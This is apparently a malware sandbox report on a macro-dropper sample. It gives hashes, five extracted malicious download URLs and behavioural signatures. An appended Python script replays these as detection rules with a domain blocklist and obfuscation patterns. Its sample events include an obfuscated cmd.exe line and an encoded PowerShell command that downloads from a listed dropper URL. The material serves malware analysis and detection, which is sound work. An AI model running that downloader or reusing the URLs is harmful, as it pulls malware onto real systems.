General

  • Target

    5151bd3104394432cffa51af08f04180_JaffaCakes118

  • Size

    64KB

  • Sample

    240517-y4xvfahb8x

  • MD5

    5151bd3104394432cffa51af08f04180

  • SHA1

    97d1b370994ef8fa437a072c2b5f7d894fcfe793

  • SHA256

    e4a8ef4a30f6ae792c62a1b9f811b5d0bb1a4e92f5e1d0380e9ab1d36ee59290

  • SHA512

    f415ec2e78de75043ab855bc3461700b29dbb8e4150e4bc54dacc3206d729bfb6bd396a110b1bc355fa13e86706861e8fc7d8cec22e8f7ebc6000800b2ff85ba

  • SSDEEP

    768:8pJcaUitGAlmrJpmxlzC+w99NBD+1onWSBzY4j8NrcBYbhn8R:8ptJlmrJpmxlRw99NBD+an1c8

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (exe.dropper)

    http://alignsales.com/5iTjBVHgiZ
    http://aquatroarquitetura.com.br/xqk3qb5a
    https://adamant.kz/CVjsyDag
    http://02feb02.com/d8rOmLBT
    http://pornbeam.com/B6v8OJvL

Targets

    • Target

      5151bd3104394432cffa51af08f04180_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Obfuscated cmd.exe command line

      An obfuscated cmd.exe command line is typically used to evade detection.
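The three signatures above, together with the dropper URLs from the extracted config, replayed as detection logic over process-creation and network-connection events. This is an added example written for this page; it is not code from the sandbox report or the sandbox vendor's own signature engine. The event schema, the Office-parent and blocklisted-process sets, the obfuscation heuristics and the score threshold, and the sample events (including the constructed cmd.exe command line and the base64-encoded PowerShell downloader) are all the editor's assumptions, not data captured from the sample.

```python
"""Added example, not taken from the sandbox report: replays the report's
three behavioural signatures over constructed, Sysmon-style events.
Event shape, process sets, heuristics and thresholds are assumptions."""
import base64
import re
from urllib.parse import urlparse

# Payload URLs copied from the report's extracted config (exe.dropper entries).
DROPPER_URLS = [
    "http://alignsales.com/5iTjBVHgiZ",
    "http://aquatroarquitetura.com.br/xqk3qb5a",
    "https://adamant.kz/CVjsyDag",
    "http://02feb02.com/d8rOmLBT",
    "http://pornbeam.com/B6v8OJvL",
]
BLOCKLIST_HOSTS = {urlparse(u).hostname for u in DROPPER_URLS}

# Assumed process sets: Office parents that should never spawn a script host,
# the script hosts themselves, and processes whose outbound traffic is blocklisted.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NET_BLOCKLIST = {"cmd.exe", "powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# PowerShell -EncodedCommand (or its -e/-enc short forms) followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{40,})", re.I)
CONCAT_RE = re.compile(r"\$\w+\s*=\s*'[^']*'\s*\+\s*'")   # $u='http://alig'+'nsales...'
ENVVAR_RE = re.compile(r"\bset\s+\w+=", re.I)               # set p=pow&&set q=ershell&&%p%%q%


def obfuscation_score(cmdline: str) -> int:
    """Count obfuscation tells in a cmd.exe/PowerShell command line (assumed heuristics)."""
    score = 0
    if cmdline.count("^") >= 3:                 # caret insertion defeats plain string matching
        score += 1
    if cmdline.count('"') >= 8:                 # excessive quoting splits keywords
        score += 1
    m = ENC_RE.search(cmdline)
    if m:                                       # -EncodedCommand hides the script body
        score += 1
        try:                                    # decode the UTF-16LE payload and score it too
            score += obfuscation_score(base64.b64decode(m.group(1)).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            pass
    if CONCAT_RE.search(cmdline):               # string concatenation splits URLs and cmdlets
        score += 1
    if re.search(r"\b(cmd|powershell)\b", cmdline, re.I) and ENVVAR_RE.search(cmdline) and "%" in cmdline:
        score += 1                              # environment-variable substitution rebuilds commands
    return score


def analyze(events, threshold: int = 2):
    """Return (signature, detail) pairs for the report's three behaviours."""
    hits = []
    for ev in events:
        if ev["type"] == "process_create":
            parent, child = ev["parent"].lower(), ev["image"].lower()
            if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
                hits.append(("Process spawned unexpected child process", f"{parent} -> {child}"))
            if child in {"cmd.exe", "powershell.exe"} and obfuscation_score(ev["cmdline"]) >= threshold:
                hits.append(("Obfuscated cmd.exe command-line", ev["cmdline"][:48]))
        elif ev["type"] == "network_connect":
            if ev["image"].lower() in NET_BLOCKLIST and ev["dest_host"].lower() in BLOCKLIST_HOSTS:
                hits.append(("Blocklisted process makes network request", f"{ev['image']} -> {ev['dest_host']}"))
    return hits


# Constructed sample chain (not captured from the sample): Word spawns an
# obfuscated cmd.exe, which launches an encoded PowerShell downloader.
CMD_OBFUSCATED = "cmd /c set p=pow^&^&set q=ershell^&^&%p%%q% -w hidden -nop"
PS_SCRIPT = "$u='http://alig'+'nsales.com/5iTjBVHgiZ';(New-Object Net.WebClient).DownloadString($u)"
PS_ENCODED_CMDLINE = "powershell.exe -w hidden -nop -enc " + base64.b64encode(PS_SCRIPT.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"type": "process_create", "parent": "explorer.exe", "image": "WINWORD.EXE", "cmdline": "WINWORD.EXE /n invoice.doc"},
    {"type": "process_create", "parent": "WINWORD.EXE", "image": "cmd.exe", "cmdline": CMD_OBFUSCATED},
    {"type": "process_create", "parent": "cmd.exe", "image": "powershell.exe", "cmdline": PS_ENCODED_CMDLINE},
    {"type": "network_connect", "image": "powershell.exe", "dest_host": "alignsales.com", "dest_port": 80},
    {"type": "process_create", "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir C:\\Users"},
    {"type": "network_connect", "image": "chrome.exe", "dest_host": "alignsales.com", "dest_port": 80},
]

if __name__ == "__main__":
    for sig, detail in analyze(SAMPLE_EVENTS):
        print(f"[{sig}] {detail}")
```

The benign explorer.exe to cmd.exe launch and the chrome.exe connection to a listed host produce no hits: the first because its command line scores zero, the second because the report's signature keys on the requesting process, not only on the destination. In a real pipeline the events would come from Sysmon Event ID 1 (process creation) and Event ID 3 (network connection), and the threshold would be tuned against the environment's own baseline of cmd.exe usage.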

MITRE ATT&CK Enterprise v15

Tasks